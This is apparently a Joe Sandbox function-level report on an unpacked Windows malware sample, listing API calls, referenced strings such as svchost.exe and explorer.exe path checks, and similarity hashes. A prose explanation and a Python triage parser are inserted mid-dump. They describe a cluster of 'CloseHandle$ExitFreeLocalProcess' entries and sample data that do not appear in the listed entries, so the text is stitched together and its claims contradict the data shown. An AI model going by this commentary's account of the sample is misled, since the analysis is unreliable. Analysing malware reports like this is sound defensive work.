                          • Opcode Fuzzy Hash: de0fa354a8bf079bf6eb281e5a023c9c6e82e3ce10cf06fa8df24ade5fe33fdc
                          • Instruction Fuzzy Hash: AC1106B9A04208EFCB04DF94D9889DDBBB5FF88311F248299E90997390C734AE84DB54
                          APIs
                          • __getptd.LIBCMT ref: 0042A3B8
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __getptd.LIBCMT ref: 0042A3CF
                          • __amsg_exit.LIBCMT ref: 0042A3DD
                          • __lock.LIBCMT ref: 0042A3ED
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0042A401
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                          • String ID:
                          • API String ID: 938513278-0
                          • Opcode ID: 502c2b2fb89e54d45840528a35472bab4a733277ef7d688bb02b0887a1ed57ea
                          • Instruction ID: a1cda5e7ab9d61d3e426a8a40c7ace11dbfad44217dc764019215e7f5c78a112
                          • Opcode Fuzzy Hash: 502c2b2fb89e54d45840528a35472bab4a733277ef7d688bb02b0887a1ed57ea
                          • Instruction Fuzzy Hash: 0CF06232F04730DBD621BBA9B44674D73A0AF00718F91415FED04A72D2CA6C5950DAAF
                          APIs
                          • CloseHandle.KERNEL32(?), ref: 00422604
                          • ReleaseMutex.KERNEL32(00000000), ref: 0042261E
                          • CloseHandle.KERNEL32(00000000), ref: 00422628
                          • CloseHandle.KERNEL32(00000000), ref: 00422638
                          • CloseHandle.KERNEL32(00000000), ref: 00422642
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$MutexRelease
                          • String ID:
                          • API String ID: 2279609368-0
                          • Opcode ID: e822554bf4181ca65d3795211eddee638706090535dc2ce0247a697c814c7736
                          • Instruction ID: 862424a588e8dd2487d3b9dfc9e4d7e86187c93c22c59aea2a38e8b2ab33fc47
                          • Opcode Fuzzy Hash: e822554bf4181ca65d3795211eddee638706090535dc2ce0247a697c814c7736
                          • Instruction Fuzzy Hash: E3F01275A08104FFC758CBE4F84CB9EB7B4EF89301F50D5A9E61152250CB78A588DF28
                          APIs
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • GetLastError.KERNEL32 ref: 0040834C
                          • __snwprintf.LIBCMT ref: 0040838E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$__snwprintf$ErrorLast
                          • String ID: %s%s$P
                          • API String ID: 3802810302-50959982
                          • Opcode ID: bc1b8c293ba201357ccb913cb72a36575da1c7da07590cb66db7a39783de867e
                          • Instruction ID: 73a450a735d616e95ec107ec45effab6a287e996992bc8ca54a5e87a77df302d
                          • Opcode Fuzzy Hash: bc1b8c293ba201357ccb913cb72a36575da1c7da07590cb66db7a39783de867e
                          • Instruction Fuzzy Hash: AD418C71D00209EBCB14DFE0D949BEEBB74EB48701F60463AE255B22D0DB785984CBA9
                          APIs
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • __snwprintf.LIBCMT ref: 004071DD
                          • _memset.LIBCMT ref: 004071F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrlen
                          • String ID: 0MC$D
                          • API String ID: 2688013242-4244150477
                          • Opcode ID: 860fff2541f56bcf47d8d26c0c537dde594f71d5a132f6b973e5a3fb64b91166
                          • Instruction ID: 10cbdec7c9ac47424c67d3a6a1a6e2070451d315397af7c751663e227473bba2
                          • Opcode Fuzzy Hash: 860fff2541f56bcf47d8d26c0c537dde594f71d5a132f6b973e5a3fb64b91166
                          • Instruction Fuzzy Hash: 7331A275E44208BBDB14DBA0DC89FED7779EF48700F4001A9F209A62D0DAB95A84CB55
                          APIs
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • __snwprintf.LIBCMT ref: 0041451D
                          • _memset.LIBCMT ref: 00414530
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrlen
                          • String ID: D$PdC
                          • API String ID: 2688013242-3338248644
                          • Opcode ID: fe8873d95505cb6751ff10fd3157c6c0e2ca1b70d4d3f1a1343b5945491f884f
                          • Instruction ID: 588705de2f19d31047822466ba8bb562fba55fce3293227ce1f551950129919c
                          • Opcode Fuzzy Hash: fe8873d95505cb6751ff10fd3157c6c0e2ca1b70d4d3f1a1343b5945491f884f
                          • Instruction Fuzzy Hash: 77318275A40204BBDB14DBA0DC49FED7779EB48700F5041A9F709A62D0DAB99AC4CB58
                          APIs
                          • lstrcpyW.KERNEL32(0000001C,00473914), ref: 00423805
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: %s [%d]
                          • API String ID: 3722407311-2053052012
                          • Opcode ID: fb1d88b360f33a36618ed2c57b45f9f7639ef725057e385a61569c6b36f9ebf5
                          • Instruction ID: 3e2ef716702ff8af2041370b3f16d71dd1bfc4ff5dee9cabf348363d4275f40d
                          • Opcode Fuzzy Hash: fb1d88b360f33a36618ed2c57b45f9f7639ef725057e385a61569c6b36f9ebf5
                          • Instruction Fuzzy Hash: EE3172B4E00218AFC714DFA0EC4DBAD77B5EF48305F5081E9E509A7251D7789A84CF58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrlen
                          • String ID: %s\%s
                          • API String ID: 2688013242-4073750446
                          • Opcode ID: f9e56d3aa41bacb30b4bc2133f7ec09a247619fcba0ec4d2fda5b0f026a56986
                          • Instruction ID: 4184cf32529d506793041f360e4a7a16044ff04311cc4cd1caccecf4196b836d
                          • Opcode Fuzzy Hash: f9e56d3aa41bacb30b4bc2133f7ec09a247619fcba0ec4d2fda5b0f026a56986
                          • Instruction Fuzzy Hash: FA317C74A00208EBDB14DFE4DC49BAEB775EF88700F10857AE509A76D0D7B8A948CB59
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00414D63
                          • CloseHandle.KERNEL32(00000000), ref: 00414DA5
                          • CloseHandle.KERNEL32(00000000), ref: 00414E07
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00414E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: 7bf6401253e6f631bd6c36b48544ad9e04f4c315d5b0184a5574e10b3e340590
                          • Instruction ID: d60757e844d62c9bc84a99f973ef0d3c017041af1da156204418206e71e7bf80
                          • Opcode Fuzzy Hash: 7bf6401253e6f631bd6c36b48544ad9e04f4c315d5b0184a5574e10b3e340590
                          • Instruction Fuzzy Hash: A241ED31A04524CFFB28CF28C898B95B772FB90309F1482E9D01E9F296C635AD95CF55
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00416EFC
                          • CloseHandle.KERNEL32(00000000), ref: 00416F32
                          • CloseHandle.KERNEL32(00000000), ref: 00416F82
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00416FEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: e324f94cbf851a2910fcf3c179efc2696829d54d2965bc7dca18b93eba61898c
                          • Instruction ID: f51066ab44949191618277d7d738a25aa9843502ef076337e26828cd42860881
                          • Opcode Fuzzy Hash: e324f94cbf851a2910fcf3c179efc2696829d54d2965bc7dca18b93eba61898c
                          • Instruction Fuzzy Hash: 2F317230604409CBFB1CCF98C698AAEBB72EBD030DF1542A9D0166F691C235FA95CB45
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: und_memcpywsprintf
                          • String ID: 31B$31B
                          • API String ID: 2861580878-3187735358
                          • Opcode ID: 31ffe1f24cc8fb3647ddc14058845ad3ef99fb4cc49b8fe8ee175df2338c5ad5
                          • Instruction ID: b4ae27ccb64861e9f20b72aa9d35f228ba202a91c8d5a22e48184958d8549bad
                          • Opcode Fuzzy Hash: 31ffe1f24cc8fb3647ddc14058845ad3ef99fb4cc49b8fe8ee175df2338c5ad5
                          • Instruction Fuzzy Hash: AD21B6B1B00304ABCB04DFA4EC4AF9E73B8AF44705F404439F50D9B281E678EA44CB59
                          APIs
                          • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 00408932
                          • __snwprintf.LIBCMT ref: 0040894E
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040895E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectorySystem__snwprintflstrcmpi
                          • String ID: %s\svchost.exe
                          • API String ID: 2474157625-1955667316
                          • Opcode ID: f140f3511efa23614a5a543a6e532cd2d95bbef54c98400a65d4e4f6287528cf
                          • Instruction ID: 84f6bcce6b4092c07673cefaacb6d186facc470a59003fe25131f87b18e2032c
                          • Opcode Fuzzy Hash: f140f3511efa23614a5a543a6e532cd2d95bbef54c98400a65d4e4f6287528cf
                          • Instruction Fuzzy Hash: 1E21B0B4A04209FBDB04AFE0DD49FAE7779EF48701F504079F605A72D0CA389944CB59
                          APIs
                          • GetWindowsDirectoryW.KERNEL32(00000000,00007FFF), ref: 00408832
                          • __snwprintf.LIBCMT ref: 0040884E
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040885E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryWindows__snwprintflstrcmpi
                          • String ID: %s\explorer.exe
                          • API String ID: 127453217-2893622748
                          • Opcode ID: f9270bd1e24ab9dc883aea22219693d5cf2aa0688a95a53f135fea40c6b49bda
                          • Instruction ID: 3141bf42dfe8fa5b2e51042ad20096cfb300bb1e07b48db8893e0d2f84bdf8f8
                          • Opcode Fuzzy Hash: f9270bd1e24ab9dc883aea22219693d5cf2aa0688a95a53f135fea40c6b49bda
                          • Instruction Fuzzy Hash: 07217C75A00208FBDB18AFE0DD49EAE7779EF48701F9080B9F605A72D0CA789944CB18
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00414D63
                          • CloseHandle.KERNEL32(00000000), ref: 00414DA5
                          • CloseHandle.KERNEL32(00000000), ref: 00414E07
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00414E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: 765d9590b46e21282e323ac144b6d05c2c903fc6e7ce717fb6fd441f0889dce7
                          • Instruction ID: 250e2fd052c42d83d58a107ee35c626be7e2054d6c92c19b6dde5c9cdca0a25a
                          • Opcode Fuzzy Hash: 765d9590b46e21282e323ac144b6d05c2c903fc6e7ce717fb6fd441f0889dce7
                          • Instruction Fuzzy Hash: A931C931A04424CBFB28CB28C998F95B772EB90309F1482E9D01EAB296C635AD95CF55
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00416EFC
                          • CloseHandle.KERNEL32(00000000), ref: 00416F32
                          • CloseHandle.KERNEL32(00000000), ref: 00416F82
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00416FEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: 18227b46a8ccaeff8cf376f5b7dc665baa5299777fca2668b67ddfb68e98c635
                          • Instruction ID: a2053963612c7df701548f413a23bf0d8b665a46cc1246d76edfa23e3017fdb9
                          • Opcode Fuzzy Hash: 18227b46a8ccaeff8cf376f5b7dc665baa5299777fca2668b67ddfb68e98c635
                          • Instruction Fuzzy Hash: 643181306044098BFB1CCF98C698ABEB772EBD030DF254269D0266F695C235FD95CB55
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004146EA
                          • CloseHandle.KERNEL32(00000000), ref: 00414707
                          • CloseHandle.KERNEL32(00000000), ref: 00414757
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00414815
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: eb02805e49a25159c0565fb0f213c785163c53f9db9ebd391404e31c3de044db
                          • Instruction ID: 452fd7c3f545b44941b34f0a06ef3db5d32d18bca581c84b690aab980fb1c7e6
                          • Opcode Fuzzy Hash: eb02805e49a25159c0565fb0f213c785163c53f9db9ebd391404e31c3de044db
                          • Instruction Fuzzy Hash: EC312A31A04404DBFB18CF98C698AADBB72EBD030DF1442ADD0266F295C635EA95CB44
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcscat$__snwprintf
                          • String ID: '%s'
                          • API String ID: 4289553879-2201965518
                          • Opcode ID: a20dd1b1dfba752180f8dd49261f106a7bb5618e1af8ed39c63cb2ecfb0330d7
                          • Instruction ID: 33df056c0529464a2baafdcece2817d9c0c4b0809bae14ddce2661c75d660747
                          • Opcode Fuzzy Hash: a20dd1b1dfba752180f8dd49261f106a7bb5618e1af8ed39c63cb2ecfb0330d7
                          • Instruction Fuzzy Hash: 17113970A4021CEBCB64DF40D889BE9B775EBA4304F20829AE5096A291C7789EC5CF95
                          APIs
                          • GetModuleHandleA.KERNEL32(NTDLL,RtlGetVersion), ref: 0041D18D
                          • GetProcAddress.KERNEL32(00000000), ref: 0041D194
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NTDLL$RtlGetVersion
                          • API String ID: 1646373207-3678323915
                          • Opcode ID: 9354b5732965cfba0f5824ff44d8cb7257062b48f70c4c62bbb50e4734e20b80
                          • Instruction ID: 68295a6955420c89adeaee12c2ebc351c74c000644921af01294e337443e3b95
                          • Opcode Fuzzy Hash: 9354b5732965cfba0f5824ff44d8cb7257062b48f70c4c62bbb50e4734e20b80
                          • Instruction Fuzzy Hash: 7BF01CB09062189BCB249F60EC4A7D8BBB4AB0C311F0011E9A94862240CB785DE48F4C
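The records above are Joe Sandbox's per-function entries: the API calls resolved inside one function (with a "Part of subcall function" prefix for calls made one level down), the string constants it references, and similarity hashes. Three patterns on this page are worth pulling out of that format rather than reading by eye: the functions that build "%s\svchost.exe" from GetSystemDirectoryW and "%s\explorer.exe" from GetWindowsDirectoryW and compare the result with lstrcmpiW (an image-path check against a well-known host binary), the GetModuleHandleA("NTDLL") / GetProcAddress pair that resolves RtlGetVersion at run time, and the run of five CloseHandle$ExitFreeLocalProcess entries that share one Instruction ID under five different Opcode IDs (the same function body present at several locations in the dump). The Python below is an added example for this page, not Joe Sandbox code and not part of the analysed sample: it parses entries in this format, tags those patterns, and reports instruction-hash clusters. SAMPLE is abridged from entries on this page (API lines kept verbatim, hash and snapshot lines the analysis does not use dropped); the tag names and the heuristics behind them are this example's own, not Joe Sandbox's.

```python
"""Triage helper for Joe Sandbox IDA-plugin function entries in the format shown above.
Added example for this page, not Joe Sandbox code and not part of the analysed sample.
SAMPLE is abridged from entries on this page (API lines verbatim; hash and snapshot lines
the analysis does not use are dropped). Tag rules are this example's own heuristics.
"""
import re
from collections import defaultdict

# "• GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 00408932"  (argument list present)
# "• __snwprintf.LIBCMT ref: 0040894E"                                 (CRT symbol, no list)
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w:~]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "• String ID: %s\svchost.exe"

def parse_entries(text):
    """Split a dump into per-function entries; each entry begins at a bare 'APIs' line."""
    entries, cur, section = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":
            cur = {"calls": [], "subcalls": [], "meta": {}}
            entries.append(cur)
            section = line
        elif cur is None or not line:
            continue
        elif not line.startswith("•"):        # a bare line is a section heading
            section = line
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                call = {"api": m["api"], "module": m["mod"], "ref": m["ref"],
                        "args": [a for a in (m["args"] or "").split(",") if a]}
                (cur["subcalls"] if m["sub"] else cur["calls"]).append(call)
        elif (m := KV_RE.match(line)):        # Similarity / Memory Dump Source items
            cur["meta"][m["key"]] = m["val"]
    return entries

def tag_entry(entry):
    """Behaviour tags worth pivoting on (this example's heuristics, not Joe Sandbox's)."""
    apis = {c["api"] for c in entry["calls"]}
    sid = entry["meta"].get("String ID", "")
    tags = []
    # "%s\<name>.exe" built from GetSystemDirectoryW/GetWindowsDirectoryW output and
    # compared case-insensitively: an image-path check against a well-known host binary.
    if "lstrcmpiW" in apis and apis & {"GetSystemDirectoryW", "GetWindowsDirectoryW"} \
            and re.search(r"\\\w+\.exe$", sid):
        tags.append("path-compare:" + sid.rsplit("\\", 1)[-1])
    # GetModuleHandleA followed by GetProcAddress; the report prints the export name next
    # to the module name because both strings are on the stack at that call site.
    for c in entry["calls"]:
        if c["api"] == "GetModuleHandleA" and len(c["args"]) >= 2 and "GetProcAddress" in apis:
            tags.append("dynamic-resolve:" + "!".join(c["args"][:2]))
    return tags

def triage(text):
    """Opcode ID -> tags, for every entry that earned at least one tag."""
    tagged = ((e["meta"].get("Opcode ID", "?"), tag_entry(e)) for e in parse_entries(text))
    return {oid: tags for oid, tags in tagged if tags}

def duplicate_code_clusters(entries):
    """Instruction ID -> Opcode IDs. One instruction hash under several opcode IDs is the
    same function body present at more than one location, as in the run of entries above."""
    clusters = defaultdict(list)
    for e in entries:
        if "Instruction ID" in e["meta"]:
            clusters[e["meta"]["Instruction ID"]].append(e["meta"].get("Opcode ID"))
    return {k: v for k, v in clusters.items() if len(v) > 1}

SAMPLE = r"""
APIs
• GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 00408932
• __snwprintf.LIBCMT ref: 0040894E
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040895E
Similarity
• API ID: DirectorySystem__snwprintflstrcmpi
• String ID: %s\svchost.exe
• Opcode ID: f140f3511efa23614a5a543a6e532cd2d95bbef54c98400a65d4e4f6287528cf
• Instruction ID: 84f6bcce6b4092c07673cefaacb6d186facc470a59003fe25131f87b18e2032c
APIs
• GetModuleHandleA.KERNEL32(NTDLL,RtlGetVersion), ref: 0041D18D
• GetProcAddress.KERNEL32(00000000), ref: 0041D194
Similarity
• API ID: AddressHandleModuleProc
• String ID: NTDLL$RtlGetVersion
• Opcode ID: 9354b5732965cfba0f5824ff44d8cb7257062b48f70c4c62bbb50e4734e20b80
• Instruction ID: 68295a6955420c89adeaee12c2ebc351c74c000644921af01294e337443e3b95
APIs
Similarity
• API ID: CloseHandle$ExitFreeLocalProcess
• Opcode ID: 9da45043f5abe3937aea9bc193c07396d5de998bdd8a888cc472dc2aac9b643f
• Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
APIs
Similarity
• API ID: CloseHandle$ExitFreeLocalProcess
• Opcode ID: 59b72818c02ad9c66f209a0dfa9ef427c6eaac385237f59953ff017e171112e7
• Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
"""
```

Run triage(SAMPLE) to get the Opcode IDs of the path-compare and dynamic-resolve functions, and duplicate_code_clusters(parse_entries(SAMPLE)) to see the shared Instruction ID; on the full report text the same calls pick out the explorer.exe check and the complete five-entry cluster. The parser keys on the bullet character and the bare section headings exactly as they appear on the page, so it should be fed the report text with that layout intact.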
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00009004), ref: 0041DD7D
                          • LocalAlloc.KERNEL32(00000040,?), ref: 0041DD97
                          • LocalFree.KERNEL32(00000000), ref: 0041DDCB
                          • LocalFree.KERNEL32(00000000), ref: 0041DDE2
                          • LocalFree.KERNEL32(00000000), ref: 0041DDEC
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc
                          • String ID:
                          • API String ID: 3098330729-0
                          • Opcode ID: 448e69a00867cb3d99b80f9324dcb5b1e8482b376d9da5e8c860b9a2f77f7773
                          • Instruction ID: b2d0350986e84b2eab800b3e685bf048c83aed6538ff149342eb06eccb43b414
                          • Opcode Fuzzy Hash: 448e69a00867cb3d99b80f9324dcb5b1e8482b376d9da5e8c860b9a2f77f7773
                          • Instruction Fuzzy Hash: 3811C3B5E00208EFDB04DFA4D949BDD77B4EB48305F108495FA1597390D634AA44CF58
                          APIs
                            • Part of subcall function 0041FCA0: LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0041FCE9
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041F4D8
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFreeLocalVirtual
                          • String ID:
                          • API String ID: 3333721195-0
                          • Opcode ID: a892831002fac4f28295e6e7a85bd77b40102ac80ca255da5a90b50b025db13b
                          • Instruction ID: 15f4b76eb3a995c4f51aa39289b3a3923a2358189a1e878c7b3a25bb3c7b2905
                          • Opcode Fuzzy Hash: a892831002fac4f28295e6e7a85bd77b40102ac80ca255da5a90b50b025db13b
                          • Instruction Fuzzy Hash: 1D919474E00209DFCB14CF98C884AEEBBB1FF98304F24856AD815AB355D738A996CF54
                          APIs
                          • lstrcmpiW.KERNEL32(?,-00476118,00000000,?,?,?,?,?), ref: 0040277C
                          • _memset.LIBCMT ref: 004027A1
                          • lstrcpyW.KERNEL32(?,-00476118,?,?,?,?,?,?,?), ref: 004027BF
                            • Part of subcall function 00401C50: _wcsrchr.LIBCMT ref: 00401C5C
                          • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00402805
                            • Part of subcall function 00402AA0: construct.LIBCPMTD ref: 00402B29
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$_memset_wcsrchrconstructlstrcmpi
                          • String ID:
                          • API String ID: 2078099069-0
                          • Opcode ID: c4e0003f20ac0bdd6235f8c1352beef51fc5a9158c7f5474fb38db59637b0dc0
                          • Instruction ID: 45c4d4f9bbb270077a7a3530f78740e340acc6befb4c7b60b57660e2b99362dc
                          • Opcode Fuzzy Hash: c4e0003f20ac0bdd6235f8c1352beef51fc5a9158c7f5474fb38db59637b0dc0
                          • Instruction Fuzzy Hash: 038142B69002189BDB14DBA4CD89BDEB774FF58304F0085A9E11A772D1DB785A88CF68
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042D347
                          • __isleadbyte_l.LIBCMT ref: 0042D37A
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 0042D3AB
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 0042D419
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 9d2230088cd871af93d1a5136c05a0a66863d2ece9912571f859f81350fc7cb1
                          • Instruction ID: aaa7b1223996daabf0532f3b1482f085f54885d9027b65670956d2fec97621d6
                          • Opcode Fuzzy Hash: 9d2230088cd871af93d1a5136c05a0a66863d2ece9912571f859f81350fc7cb1
                          • Instruction Fuzzy Hash: 5131C231F00265EFDB20DF64E8849AE7BA5FF01311F94856AF8A18B291D334DD40DB9A
                          APIs
                          • lstrcmpiW.KERNEL32(?,-00476118,00000000,?,?,?,?,?), ref: 0040277C
                          • _memset.LIBCMT ref: 004027A1
                          • lstrcpyW.KERNEL32(?,-00476118,?,?,?,?,?,?,?), ref: 004027BF
                            • Part of subcall function 00401C50: _wcsrchr.LIBCMT ref: 00401C5C
                          • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00402805
                            • Part of subcall function 00402AA0: construct.LIBCPMTD ref: 00402B29
                          Memory Dump Source
